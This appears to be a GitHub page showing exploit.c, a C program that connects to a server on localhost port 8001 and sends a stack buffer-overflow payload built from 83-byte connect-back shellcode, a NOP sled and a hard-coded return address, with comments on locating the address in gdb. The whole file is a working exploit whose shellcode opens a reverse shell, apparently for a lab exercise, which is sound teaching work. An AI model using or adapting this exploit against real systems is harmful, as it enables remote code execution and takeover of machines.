-
Notifications
You must be signed in to change notification settings - Fork 1
/
exploit.c
124 lines (99 loc) · 2.97 KB
/
exploit.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
/*---------------------------------------------------------------------------*
* 83 bytes Connect Back shellcode *
* Author: Victor BUSA *
*---------------------------------------------------------------------------*/
#include <string.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#include <netdb.h>
#include <time.h>
#define PORTNUM 8001
#define BLENGTH 256
#define OFFSET 141
/* the correct shellcode */
char shellcode[]=
"\x31\xdb\xf7\xe3\xfe\xc3\xb0\x66"
"\x99\x52\x6a\x01\x6a\x02\x89\xe1"
"\xcd\x80\x96\x6a\x66\x58\x43\xbf"
"\x80\xff\xff\xfe\xf7\xd7\x57\x66"
"\x68\x30\x39\x66\x53\x89\xe1\x6a"
"\x10\x51\x56\x89\xe1\x43\xcd\x80"
"\x87\xde\x6a\x02\x59\xb0\x3f\xcd"
"\x80\x49\x79\xf9\xb0\x0b\x52\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x52\x89\xe2\x53\x89"
"\xe1\xcd\x80";
static void
loop(int s)
{
unsigned char buffer[BLENGTH];
for (;;) {
/* Receive prompt */
if (recv(s, (void *)buffer, BLENGTH, 0) != BLENGTH) {
break;
}
int i;
/* Display prompt */
fputs(buffer, stdout);
/* Simulate the fact the user type 1 */
strncpy(buffer, "1\n", sizeof(buffer)-1);
buffer[sizeof(buffer)-1] = '\0';
/* send user response */
send(s, (void *)buffer, BLENGTH, 0);
// NOPS in the buffer
for(i = 0 ; i < OFFSET ; i++ ) buffer[i] = 0x90;
// Shellcode at the beginning of the buffer
memcpy(buffer, shellcode, strlen(shellcode));
/* return addr at the end of the buffer. The ret
addr point on the address of the response, you may need to change it
to do so just launch the server in gdb, breakpoint 81 and run and take
the address of response and replace it here */
memcpy(buffer+OFFSET-5, "\xf4\x72\x6e\x01", 4);
/* So our payload looks like :
* _____________________________________________
* | shellcode | NOPS | return addr |
* |_____________|___________|___________________|
*/
/* Send user response */
send(s, (void *)buffer, BLENGTH, 0);
}
}
int
main(void)
{
struct sockaddr_in server;
struct hostent *host;
int s;
/* Create an Internet family, stream socket */
s = socket(AF_INET, SOCK_STREAM, 0);
if (s < 0) {
perror("socket()");
exit(EXIT_FAILURE);
}
/* Server listening on localhost interface */
if ((host = gethostbyname("localhost")) == NULL) {
perror("gethostbyname()");
exit(EXIT_FAILURE);
}
/* Fill in socket address */
memset((char *)&server, '\0', sizeof (server));
server.sin_family = AF_INET;
server.sin_port = htons(PORTNUM);
memcpy((char *)&server.sin_addr, host->h_addr_list[0], host->h_length);
/* Connect to server */
if (connect(s, (struct sockaddr *)&server, sizeof (server)) < 0) {
perror("connect()");
exit(EXIT_FAILURE);
}
/* Talk to server */
loop(s);
/* Close the socket */
close(s);
return (0);
}